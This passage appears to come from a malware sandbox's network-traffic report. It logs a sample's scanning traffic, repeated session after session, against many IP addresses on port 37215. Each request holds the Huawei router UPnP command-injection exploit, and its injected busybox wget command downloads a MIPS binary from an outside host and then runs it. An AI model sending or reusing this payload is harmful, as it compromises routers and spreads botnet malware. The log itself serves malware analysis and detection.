20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1906192.168.2.153979641.246.7.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000485897 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1907192.168.2.1534112110.206.140.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.000541925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1908192.168.2.1548046184.34.156.8937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.004679918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1909192.168.2.1554366157.194.176.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.004688978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1910192.168.2.1551594190.231.112.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.005748034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1911192.168.2.1559506197.215.195.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.005860090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1912192.168.2.1555446157.250.223.037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.005945921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1913192.168.2.1558580157.78.48.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.005996943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1914192.168.2.1534496223.153.88.7237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.006124973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1915192.168.2.153892441.174.247.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.006546974 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1916192.168.2.1534078190.35.149.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.006633043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
